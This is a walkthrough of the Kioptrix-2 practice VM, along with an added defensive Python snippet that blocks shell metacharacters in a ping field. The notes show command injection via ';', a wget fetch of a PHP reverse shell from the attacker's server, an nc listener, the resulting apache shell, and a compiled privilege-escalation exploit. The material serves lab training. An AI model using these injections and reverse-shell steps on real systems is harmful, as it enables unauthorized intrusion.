Kioptrix-2 Walkthrough / Notes
Basic SQL injection gets you in.
Using a semicolon ';' ends the previous command and lets the next command run.
; ls -la
; cd /usr/ && ls -la
So we can string commands together using '&&' as usual from the shell.
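From the defender's side, the fix for the command chaining above is to never let the form field reach a shell: allow-list the target and pass it as a single argv element. The following is an added example written for these notes, not code from the Kioptrix VM; the sample inputs are constructed from the injected commands above.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters that let one form field carry several commands:
# ';' ends the previous command, '&&' and '|' chain another one.
SHELL_META = re.compile(r"[;&|`$()<>\n]")
# Allow-list for a ping target: a plain hostname (no leading '-' so it cannot become an option).
HOSTNAME = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(\.(?!-)[A-Za-z0-9-]{1,63})*$")

# Constructed inputs modelled on the injections in these notes (not a real log).
SAMPLE_INPUTS = [
    "192.168.0.50",
    "kioptrix.level2",
    "192.168.0.50; ls -la",
    "192.168.0.50; cd /usr/ && ls -la",
    "192.168.0.50;find / -user apache",
]


def is_safe_target(value):
    """True only if the field is exactly one IPv4 address or one hostname."""
    if len(value) > 253 or SHELL_META.search(value):
        return False
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None


def build_ping_argv(target):
    """Argument vector for ping; with shell=False metacharacters are never interpreted."""
    if not is_safe_target(target):
        raise ValueError("refusing target with disallowed characters")
    return ["ping", "-c", "3", target]


def run_ping(target):
    """Run ping from an argv list (no shell) and return its exit status."""
    return subprocess.run(build_ping_argv(target), check=False).returncode


def flag_injection_attempts(inputs):
    """Return (input, first metacharacter) for every value that would have chained a command."""
    flagged = []
    for value in inputs:
        hit = SHELL_META.search(value)
        if hit:
            flagged.append((value, hit.group()))
    return flagged
```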
We set up a Python HTTP server on port 4444 in the directory holding pentestmonkey's 'php-reverse-shell'.
(We can't use b374k because we can't access the file directly from the URL.)
We port-forward port 4444 from any IP to our local machine's LAN address.
Now we change the IP address in php-reverse-shell to our public IP and the port to 4444.
Next we upload the PHP file, but we can't because we don't have write permission in the current directory.
So we find a directory we can write to.
OK, so now we are the user apache.
Let's see which directories are owned by apache:
;find / -user apache
/var/cache/mod_proxy
/var/cache/mod_ssl
/var/lib/dav
OK, so the directory "/var/lib/dav" looks like a good place to upload our reverse shell.
Next we cd into the directory and upload our shell:
;cd /var/lib/dav && /usr/bin/wget PUBLIC-IP:4444/php-reverse-shell.php
At the same time, make sure your HTTP server is running in the directory where the php-reverse-shell file resides:
#python -m SimpleHTTPServer 4444
Serving HTTP on 0.0.0.0 port 4444 ...
126.96.36.199 - - [19/Sep/2017 17:55:13] "GET /php-reverse-shell.php HTTP/1.0" 200 -
Awesome! Our file has been uploaded to the server. Let's confirm:
;ls -la /var/lib/dav
We should see the file.
Next we need to make sure the file has permission to be executed:
;chmod 777 /var/lib/dav/php-reverse-shell.php
And now we have a listener set up on the sending box (seems backwards...):
#nc -v -n -l -p 4444
OK, now we execute the PHP file; since we can't browse to it, we use the 'php' command.
And we should get the shell:
listening on [any] 4444 ...
connect to [192.168.0.100] from (UNKNOWN) [188.8.131.52] 32800
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 17:10:07 up 3:41, 0 users, load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$
Priv escalation spoiler
#gcc -o 9542 9542.c && ./9542
Output to web browser:
Content-type: text/html
X-Powered-By: PHP/4.3.9
Content-type: text/html
X-Powered-By: PHP/4.3.9
Successfully opened reverse shell to 184.108.40.206:4444
ERROR: Shell connection terminated